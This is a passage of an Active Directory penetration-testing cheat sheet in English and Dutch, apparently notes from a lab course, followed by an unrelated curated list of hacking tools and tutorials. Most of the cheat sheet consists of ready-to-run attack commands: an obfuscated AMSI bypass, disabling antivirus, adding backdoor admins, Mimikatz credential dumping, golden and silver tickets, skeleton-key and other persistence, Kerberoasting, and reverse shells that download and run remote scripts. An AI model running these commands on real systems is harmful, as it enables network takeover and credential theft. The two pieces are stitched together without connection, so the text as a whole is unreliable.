Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName '<domain>\<username>'
```
#### Jekins
```
Runs as local admin, go to /job/project/configure to try to see if you have build permissions in /job/project0/configure
Execute windows or shell comand into the build, you can also use powershell scripts
```
### Add user to local admin and RDP group and enable RDP on firewall
```
net user <username> <password> /add /Y && net localgroup administrators <username> /add && net localgroup "Remote Desktop Users" <username> /add && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```
# Lateral Movement
## General
#### Connect to machine with administrator privs
```
Enter-PSSession -Computername <computername>
$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess
```
#### Execute commands on a machine
```
Invoke-Command -Computername <computername> -Scriptblock {whoami}
Invoke-Command -Scriptblock {whoami} $sess
```
#### Load script on a machine
```
Invoke-Command -Computername <computername> -FilePath <path>
Invoke-Command -FilePath <path> $sess
```
#### Download and load script on a machine
```
iex (iwr http://xx.xx.xx.xx/<scriptname> -UseBasicParsing)
```
#### AMSI Bypass
```
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```
```
Invoke-Command -Scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} $sess
```
#### Disable AV monitoring
```
Set-MpPreference -DisableRealtimeMonitoring $true
```
#### Execute locally loaded function on a list of remote machines
```
Invoke-Command -Scriptblock ${function:<function>} -Computername (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Computername (Get-Content <list_of_servers>)
```
#### Check the language mode
```
$ExecutionContext.SessionState.LanguageMode
```
#### Enumerate applocker policy
```
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```
#### Copy script to other server
ps you can edit the script and call the method you wish so it executes, since you still cant load it in
```
Copy-Item .\Invoke-MimikatzEx.ps1 \\<servername>\c$\'Program Files'
```
## Mimikatz
#### Mimikatz dump credentials on local machine
```
Invoke-Mimikatz -Dumpcreds
```
#### Mimikatz dump credentials on multiple remote machines
```
Invoke-Mimikatz -Dumpcreds -Computername @(“<system1>”,”<system2>”)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")
```
#### Mimikatz start powershell pass the hash (run as local admin)
```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'
```
#### Mimikatz dump from SAM
```
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
```
or
```
reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv
#Start mimikatz as administrator
privilege::debug
token::elevate
lsadump::sam SamBkup.hiv SystemBkup.hiv
```
#### Mimikatz dump lsa (krbtgt to)
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>
```
# Domain persistence
## Golden ticket
Golden tickets zijn nagemaakte TGT tickets. TGT tickets worden gebruikt om TGS tickets aan te vragen bij de KDC(DC). De kerberos Golden Ticket is een valid TGT omdat deze ondertekend is door het KRBTGT account. Als je de hash van de KRBTGT account kan achterhalen door de hashes te dumpen op de Domain controller en deze hash niet wijzigt is het mogelijk om weer een TGT aan te vragen bij de volgende penetratietest en volledige toegang tot het domein te verkrijgen.
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets
#### Dump hashes - Get the krbtgt hash
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>
```
#### Make golden ticket
Use /ticket instead of /ptt to save the ticket to file instead of loading in current powershell process
To get the SID use ```Get-DomainSID``` from powerview
```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```
#### Use the DCSync feature for getting krbtgt hash. Execute with DA privileges
```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
```
#### Check WMI Permission
```
Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>
```
## Silver ticket
Silver tickets zijn nagemaakte TGS tickets. Omdat de ticket is nagemaakt op de workstation is er geen communicatie met de DC. Eeen silver ticket kan worden aangemaakt met de service account hash of computer account hash.
https://adsecurity.org/?p=2011
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
#### Make silver ticket for CIFS
Use the hash of the local computer
```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:CIFS /rc4:<local computer hash> /user:Administrator /ptt"'
```
#### Check access (After CIFS silver ticket)
```
ls \\<servername>\c$\
```
#### Make silver ticket for Host
```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:HOST /rc4:<local computer hash> /user:Administrator /ptt"'
```
#### Schedule and execute a task (After host silver ticket)
```
schtasks /create /S <target> /SC Weekly /RU "NT Authority\SYSTEM" /TN "Reverse" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''')'"
schtasks /Run /S <target> /TN “Reverse”
```
#### Make silver ticket for WMI
Execute for WMI /service:HOST /service:RPCSS
```
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:HOST /rc4:<local computer hash> /user:Administrator /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:RPCSS /rc4:<local computer hash> /user:Administrator /ptt"'
```
#### Check WMI Permission
```
Get-wmiobject -Class win32_operatingsystem -ComputerName <target>
```
## Skeleton key
De skeleton key attack is een aanval dat malware in het geheugen laad van de domain controller. Waarna het mogelijk is om als elke user the authenticeren met een master wachtwoord. Als je dit met mimikatz uitvoert is dit wachwoord 'mimikatz'. Dit laad een grote security gat waarbij dit wordt uitgevoerd! Voer dit dus niet uit in een productieomgeving zonder goed te overleggen met de klant. Om deze aanval te stoppen moet de domain controller worden herstart.
https://pentestlab.blog/2018/04/10/skeleton-key/
#### Create the skeleton key - Requires DA
```
Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <target>
```
## DSRM
De Directory Services Restore Mode is een boot option waarin een domain controller kan worden opgestart zodat een administrator reparaties of een recovery kan uitvoeren op de active directory database. Dit wachtwoord wordt ingesteld tijdens het installeren van de domain controller en wordt daarna bijna nooit gewijzigd. Door de login behavior aan te passen van dit lokale account is het mogelijk om remote toegang te verkrijgen via dit account, een account waarvan het wachtwoord bijna nooit wijzigd! Pas op, dit tast de security van de domain controller aan!
#### Dump DSRM password - dumps local users
look for the local administrator password
```
Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::sam”’ -Computername <target>
```
#### Change login behavior for the local admin on the DC
```
New-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2 -PropertyType DWORD
```
#### If property already exists
```
Set-ItemProperty “HKLM:\System\CurrentControlSet\Control\Lsa\” -Name “DsrmAdminLogonBehavior” -Value 2
```
#### Pass the hash for local admin
```
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer> /user:Administrator /ntlm:<hash> /run:powershell.exe"'
```
## Custom SSP - Track logons
Het is mogelijk om met een custom Security Support Provider (SSP) alle logons op een computer bij te houden. Een SSP is een DDL. Een SSP is een DLL waarmee een applicatie een geverifieerde verbinding kan verkrijgen. Sommige SSP-pakketten van Microsoft zijn: NTLM, Kerberos, Wdigest, credSSP.
Mimikatz biedt een aangepaste SSP - mimilib.dll aan. Deze SSP registreert lokale aanmeldingen, serviceaccount- en computeraccountwachtwoorden in platte tekst op de doelserver.
#### Mimilib.dll
Drop mimilib.dll to system32 and add mimilib to HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
```
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
SetItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' Value $packages
```
#### Use mimikatz to inject into lsass
all logons are logged to C:\Windows\System32\kiwissp.log
```
Invoke-Mimikatz -Command ‘”misc:memssp”’
```
## ACL
### AdminSDHolder
De AdminSDHolder container is een speciale AD container met default security permissies die gebruikt worden als template om beveiligde AD gebruikers en groepen (Domain Admins, Enterprise Admins etc.) te beveiligen en te voorkomen dat hier onbedoeld wijzingen aan worden uitgevoerd. Nadater er toegang is verkregen tot een DA is het mogelijk om deze container aan te passen voor persistence.
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
#### Check if student has replication rights
```
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
```
#### Add fullcontrol permissions for a user to the adminSDHolder
```
Add-ObjectAcl -TargetADSprefix ‘CN=AdminSDHolder,CN=System’ PrincipalSamAccountName <username> -Rights All -Verbose
```
#### Run SDProp on AD (Force the sync of AdminSDHolder)
```
Invoke-SDPropagator -showProgress -timeoutMinutes 1
#Before server 2008
Invoke-SDpropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
```
#### Check if user got generic all against domain admins group
```
Get-ObjectAcl -SamaccountName “Domain Admins” –ResolveGUIDS | ?{$_.identityReference -match ‘<username>’}
```
#### Add user to domain admin group
```
Add-DomainGroupMember -Identity ‘Domain Admins’ -Members <username> -Verbose
```
or
```
Net group "domain admins" sportless /add /domain
```
#### Abuse resetpassword using powerview_dev
```
Set-DomainUserPassword -Identity <username> -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force ) -Verbose
```
### DCsync
Bij een DCSync aanval immiteren we een DC om de wachtwoorden te achterhalen via domain replication. Hiervoor hebben we bepaalde rechten nodig op de domain controller.
https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync
https://blog.stealthbits.com/what-is-dcsync-an-introduction/
#### Add full-control rights
```
Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,DC=local’ -PrincipalSamAccountName <username> -Rights All -Verbose
```
#### Add rights for DCsync
```
Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,Dc=local’ -PrincipalSamAccountName <username> -Rights DCSync -Verbose
```
#### Execute DCSync and dump krbtgt
```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'
```
### SecurityDescriptor - WMI
```
. ./Set-RemoteWMI.ps1
```
#### On a local machine
```
Set-RemoteWMI -Username <username> -Verbose
```
#### On a remote machine without explicit credentials
```
Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Verbose
```
#### On a remote machine with explicit credentials
Only root/cimv and nested namespaces
```
Set-RemoteWMI -Username <username> -Computername <computername> -Credential Administrator -namespace ‘root\cimv2’ -Verbose
```
#### On remote machine remove permissions
```
Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Remove -Verbose
```
#### Check WMI permissions
```
Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>
```
### SecurityDescriptor - Powershell Remoting
```
. ./Set-RemotePSRemoting.ps1
```
#### On a local machine
```
Set-RemotePSRemoting -Username <username> -Verbose
```
#### On a remote machine without credentials
```
Set-RemotePSRemoting -Username <username> -Computername <computername> -Verbose
```
#### On a remote machine remove permissions
```
Set-RemotePSRemoting -Username <username> -Computername <computername> -Remove
```
### SecurityDescriptor - Remote Registry
Using the DAMP toolkit
```
. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval
```
#### Using DAMP with admin privs on remote machine
```
Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -Verbose
```
#### Retrieve machine account hash from local machine
```
Get-RemoteMachineAccountHash -Computername <computername> -Verbose
```
#### Retrieve local account hash from local machine
```
Get-RemoteLocalAccountHash -Computername <computername> -Verbose
```
#### Retrieve domain cached credentials from local machine
```
Get-RemoteCachedCredential -Computername <computername> -Verbose
```
# Domain Privilege escalation
## Kerberoast
Kerberoasting een technique waarbij de wachtwoorden van service accounts worden gekraakt. Kerberoasting is voornamelijk efficient indien er user accounts als service accounts worden gebruikt. Een TGS ticket kan worden aangevraagd voor deze user, waarbij de TGS versleuteld is met de NTLM hash van de plaintext wachtwoord van de gebruiker. Als de service account een user account is welke zelf is aangemaakt door de beheerder is de kans groter dat deze ticket te kraken is, en dus het wachtwoord wordt achterhaalt voor de service. Deze TGS ticket kan offline gekraakt worden. Voor de aanval word de kerberoas[https://github.com/nidem/kerberoast] repositorie van Nidem gebruikt.
#### Find user accounts used as service accounts
```
. ./GetUserSPNs.ps1
```
```
Get-NetUser -SPN
```
```
Get-NetUser -SPN | select samaccountname,serviceprincipalname
```
#### Reguest a TGS
```
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
```
or
```
Request-SPNTicket "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
```
#### Export ticket using Mimikatz
```
Invoke-Mimikatz -Command '"Kerberos::list /export"'
```
#### Crack the ticket
Crack the password for the serviceaccount
```
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-student1@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi
```
```
.\hashcat.exe -m 18200 -a 0 <HASH FILE> <WORDLIST>
```
## AS-REPS Roasting
AS-REPS roasting is een technique waarbij het wachtwoord achterhaald kan worden omdat de 'Do not require Kerberos preauthentication property' is aangezet, oftewel kerberos preauthentication staat uit. Een aanvaller kan de eerste stap van authenticatie overslaan en voor deze gebruiker een TGT aanvragen, welke vervolgens offline gekraakt kan worden.
#### Enumerating accounts with kerberos preauth disabled
```
. .\Powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -Verbose
```
```
Get-DomainUser -PreauthNotRequired -verbose | select samaccountname
```
#### Enumerate permissions for group
Met genoeg rechten(GenericWrite of GenericAll) is het mogelijk om kerberos preauth uit te schakelen.
```
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
```
#### Set preauth not required
```
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
#### Request encrypted AS-REP
```
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose
```
#### Enumerate all users with kerberos preauth disabled and request a hash
```
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl
```
#### Crack the hash with hashcat
Edit the hash by inserting '23' after the $krb5asrep$, so $krb5asrep$23$.......
```
Hashcat -a 0 -m 18200 hash.txt rockyou.txt
```
## Set SPN
Met genoeg rechten (GenericALL en GenericWrite) is het mogelijk om zelf de Service Principle Name attribute aan een gebruiker toe te voegen. Deze kan dan worden gekraakt met behulp van kerberoasting.
#### Enumerate permissions for group on ACL
```
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl
```
#### Check if user has SPN
```
. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalname
```
of
```
Get-NetUser | Where-Object {$_.servicePrincipalName}
```
#### Set SPN for the user
```
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=’ops/whatever1’}
```
#### Request a TGS
```
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"
```
#### Export ticket to disk for offline cracking
```
Invoke-Mimikatz -Command '"Kerberos::list /export"'
```
#### Request TGS hash for offline cracking hashcat
```
Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty Hash
```
#### Crack the hash with hashcat
Edit the hash by inserting '23' after the $krb5asrep$, so $krb5asrep$23$.......
```
Hashcat -a 0 -m 18200 hash.txt rockyou.txt
```
## Unconstrained Delegation
Unconstrained delegation is een privilege welke kan worden toegekent aan gebruikers of computers, dit gebeurt bijna altijd bij computers met services zoals ISS en MSSQL. Deze services hebben meestal toegang nodig tot een backend database namens de geverifieerde gebruiker. Wanneer een gebruiker zich verifieert op een computer waarop onbeperkt Kerberos-delegatierecht is ingeschakeld, wordt het geverifieerde TGT-ticket van de gebruiker opgeslagen in het geheugen van die computer. Als je administrator toegang hebt tot deze server, is het mogelijk om alle TGT tickets uit het geheugen te dumpen.
#### Discover domain computers which have unconstrained delegation
Domain Controllers always show up, ignore them
```
. .\PowerView_dev.ps1
Get-Netcomputer -UnConstrained
Get-Netcomputer -UnConstrained | select samaccountname
```
#### Check if any DA tokens are available on the unconstrained machine
Wait for a domain admin to login while checking for tokens
```
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
```
#### Export the TGT ticket
```
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
```
#### Reuse the TGT ticket
```
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'
```
## Constrained Delegation
Als je over een account of computer beschikt met de constrained delegation privilege is het mogelijk om je voor te doen als elk andere gebruiker en jezelf te authentiseren naar een service waar de gebruiker mag delegeren.
### Enumerate
#### Enumerate users with contrained delegation enabled
```
Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
```
#### Enumerate computers with contrained delegation enabled
```
Get-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
```
### Constrained delegation User
#### Requesting TGT with kekeo
```
./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>
```
#### Requesting TGS with kekeo
```
Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local
```
#### Use Mimikatz to inject the TGS ticket
```
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'
```
### Constrained delegation Computer
#### Requesting TGT with a PC hash
```
./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>
```
#### Requesting TGS
No validation for the SPN specified
```
Tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL
```
#### Using mimikatz to inject TGS ticket and executing DCsync
```
Invoke-Mimikatz -Command '"Kerberos::ptt <kirbi file>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'
```
## DNS Admins
Indien je over een gebruiker bezit die lid is van de 'DNS admin' is het mogelijk om verschillende aanvallen uit te voeren op de DNS server (Meestal Domain Controller) Het is mogelijk om hier een reverse shell mee te krijgen, maar dit legt heel het DNS verkeer plat binnen het domein aangezien dit de DNS service bezighoudt! Voor meer informatie zie [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise]
#### Enumerate member of the DNS admin group
```
Get-NetGRoupMember “DNSAdmins”
```
#### From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)
Share the directory the ddl is in for everyone so its accessible.
logs all DNS queries on C:\Windows\System32\kiwidns.log
```
Dnscmd <dns server> /config /serverlevelplugindll \\<ip>\dll\mimilib.dll
```
#### Restart DNS
```
Sc \\<dns server> stop dns
Sc \\<dns server> start dns
```
## Enterprise Admins
### Child to parent - trust tickets
#### Dump trust keys
Look for in trust key from child to parent (first command) - This worked best for me! Second command didnt work :(
Look for NTLM hash (second command)
```
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <computername>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\<computername>$"'
```
#### Create an inter-realm TGT
```
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:<domain> /sid:<sid of current domain> /sids:<sid of enterprise admin groups of the parent domain> /rc4:<trust hash> /service:krbtgt /target:<target domain> /ticket:<path to save ticket>"'
```
#### Create a TGS for a service (kekeo_old)
```
./asktgs.exe <kirbi file> CIFS/<forest dc name>
```
#### Use TGS to access the targeted service (may need to run it twice) (kekeo_old)
```
./kirbikator.exe lsa .\<kirbi file>
```
#### Check access to server
```
ls \\<servername>\c$
```
### Child to parent - krbtgt hash
#### Get krbtgt hash from dc
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>
```
#### Create TGT
the mimikatz option /sids is forcefully setting the SID history for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group
```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /sids:<sids> /krbtgt:<hash> /ticket:<path to save ticket>"'
```
#### Inject the ticket
```
Invoke-Mimikatz -Command '"kerberos::ptt <path to ticket>"'
```
#### Get SID of enterprise admin
```
Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData | select samaccountname, objectsid
```
## Crossforest attacks
### Trust flow
#### Dump trust keys
Look for in trust key from child to parent (first command)
Look for NTLM hash (second command)
```
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <computername>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
```
#### Create a intern-forest TGT
```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<domain sid> /rc4:<hash of trust> /service:krbtgt /target:<target> /ticket:<path to save ticket>"'
```
#### Create a TGS for a service (kekeo_old)
```
./asktgs.exe <kirbi file> CIFS/<crossforest dc name>
```
#### Use the TGT
```
./kirbikator.exe lsa <kirbi file>
```
#### Check access to server
```
ls \\<servername>\<share>\
```
### Trust abuse SQL
```
. .\PowerUpSQL.ps1
```
#### Discovery SPN scanning
```
Get-SQLInstanceDomain
```
#### Check accessibility
```
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded – Verbose
```
#### Gather information
```
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
```
#### Search for links to remote servers
```
Get-SQLServerLink -Instance <sql instance> -Verbose
```
#### Enumerate database links
```
Get-SQLServerLinkCrawl -Instance <sql instance> -Verbose
```
#### Enable xp_cmdshell
```
Execute(‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “<sql instance>”
```
#### Execute commands
```
Get-SQLServerLinkCrawl -Instance <sql instance> -Query "exec master..xp_cmdshell 'whoami'"
```
#### Execute reverse shell example
```
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPAddress xx.xx.xx.xx -Port 4000'"
```
|
# Track Awesome Hacking Updates Daily
A curated list of awesome Hacking tutorials, tools and resources
[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/carpedm20/awesome-hacking/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung) · [😺 carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) · ⭐ 10K · 🏷️ Security
[ Daily / [Weekly](/content/carpedm20/awesome-hacking/week/README.md) / [Overview](/content/carpedm20/awesome-hacking/readme/README.md) ]
## [Jul 05, 2023](/content/2023/07/05/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-last-release/)
### Tools / Other
* [Shodan](https://www.shodan.io/) - A web-crawling search engine that lets users search for various types of servers connected to the internet.
* [masscan (⭐21k)](https://github.com/robertdavidgraham/masscan) - Internet scale portscanner.
* [Keyscope (⭐371)](https://github.com/SpectralOps/keyscope) - an extensible key and secret validation tool for auditing active secrets against multiple SaaS vendors
* [CyLR (⭐546)](https://github.com/orlikoski/CyLR) - NTFS forensic image collector
* [CAINE](https://www.caine-live.net/)- CAINE is a Ubuntu-based app that offers a complete forensic environment that provides a graphical interface. This tool can be integrated into existing software tools as a module. It automatically extracts a timeline from RAM.
## [Feb 28, 2022](/content/2022/02/28/README.md)
### Online resources / Other
* [Security related Operating Systems @ Rawsec](https://inventory.raw.pm/operating_systems.html) - Complete list of security related operating systems
### tools / Other
* [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/) - An open-source inventory of tools, resources, CTF platforms and Operating Systems about CyberSecurity. ([Source](https://gitlab.com/rawsec/rawsec-cybersecurity-list))
## [Oct 20, 2021](/content/2021/10/20/README.md)
### Tools / Other
* [Decompiler.com](https://www.decompiler.com/) - Java, Android, Python, C# online decompiler.
## [Oct 09, 2021](/content/2021/10/09/README.md)
### Web / Other
* [TryHackMe](https://tryhackme.com/) - Hands-on cyber security training through real-world scenarios.
## [Sep 15, 2021](/content/2021/09/15/README.md)
### Tutorials
* [Roppers Computing Fundamentals](https://hoppersroppers.org/course.html)
* Free, self-paced curriculum that builds a base of knowledge in computers and networking. Intended to build up a student with no prior technical knowledge to be confident in their ability to learn anything and continue their security education. Full text available as a [gitbook](https://www.hoppersroppers.org/fundamentals/).
### General / Other
* [Roppers CTF Fundamentals Course](https://www.hoppersroppers.org/courseCTF.html) - Free course designed to get a student crushing CTFs as quickly as possible. Teaches the mentality and skills required for crypto, forensics, and more. Full text available as a [gitbook](https://www.hoppersroppers.org/ctf/).
### tools / Other
* [Roppers Security Fundamentals](https://www.hoppersroppers.org/courseSecurity.html) - Free course that teaches a beginner how security works in the real world. Learn security theory and execute defensive measures so that you are better prepared against threats online and in the physical world. Full text available as a [gitbook](https://www.hoppersroppers.org/security/).
## [May 27, 2021](/content/2021/05/27/README.md)
### Tools / Other
* [Netz (⭐360)](https://github.com/spectralops/netz) - Discover internet-wide misconfigurations, using zgrab2 and others.
## [Feb 16, 2021](/content/2021/02/16/README.md)
### Tools / Other
* [CSP Scanner](https://cspscanner.com/) - Analyze a site's Content-Security-Policy (CSP) to find bypasses and missing directives.
* [RustScan (⭐10k)](https://github.com/rustscan/rustscan) - Extremely fast port scanner built with Rust, designed to scan all ports in a couple of seconds and utilizes nmap to perform port enumeration in a fraction of the time.
## [Nov 03, 2020](/content/2020/11/03/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull noncetonic/archlinux-pentest-lxde` - [Arch Linux Penetration Tester](https://hub.docker.com/r/noncetonic/archlinux-pentest-lxde)
### Tutorials
* [Lena151: Reversing With Lena](https://archive.org/details/lena151)
## [Nov 02, 2020](/content/2020/11/02/README.md)
### Tutorials
* [Exploit Writing Tutorials for Pentesters](http://web.archive.org/web/20140916085343/http://www.punter-infosec.com/exploit-writing-tutorials-for-pentesters/)
### Docker Images for Penetration Testing & Security
* `docker pull metasploitframework/metasploit-framework
` - [Official Metasploit](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
## [Oct 23, 2020](/content/2020/10/23/README.md)
### Disassemblers and debuggers
* [Ghidra](https://ghidra-sre.org/) - A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission
## [Oct 02, 2020](/content/2020/10/02/README.md)
### Tools / Other
* [Git-Scanner (⭐294)](https://github.com/HightechSec/git-scanner) - A tool for bug hunting or pentesting for targeting websites that have open `.git` repositories available in public
## [Sep 30, 2020](/content/2020/09/30/README.md)
### Binary files examination and editing / Other
* [Kaitai Struct (⭐3.5k)](https://github.com/kaitai-io/kaitai_struct) - a DSL for creating parsers in a variety of programming languages. The Web IDE is particularly useful for reverse-engineering.
### Competition / Other
* [prompt(1) to win](http://prompt.ml/) - XSS Challenges
## [Aug 26, 2020](/content/2020/08/26/README.md)
### Tools / Other
